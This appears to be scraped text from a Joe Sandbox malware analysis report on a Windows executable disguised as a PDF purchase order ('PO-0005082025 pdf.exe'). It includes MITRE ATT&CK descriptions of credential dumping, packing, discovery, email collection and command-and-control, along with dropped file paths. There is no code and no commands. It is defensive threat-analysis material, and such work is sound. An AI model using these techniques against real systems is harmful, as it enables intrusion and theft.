Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report PO-0005082025 pdf.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Software Vulnerabilities

Networking

E-Banking Fraud

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\PO-0005082025 pdf.exe.log

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Temp\--cG1-69-

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4bowru2m.fhh.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cpmykwmu.pbo.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gfclfoud.juu.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_v4yysyzg.gjb.ps1

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Windows Analysis Report
PO-0005082025 pdf.exe

Function 07982D70 Relevance: 8.5, Strings: 6, Instructions: 1029
COMMON

Function 0581AAC4 Relevance: 6.9, Strings: 5, Instructions: 652
COMMON

Function 0144DEA0 Relevance: 6.1, APIs: 4, Instructions: 128
threadCOMMON

Function 079A0784 Relevance: 1.7, APIs: 1, Instructions: 245
processCOMMON

Function 079A0790 Relevance: 1.7, APIs: 1, Instructions: 243
processCOMMON

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre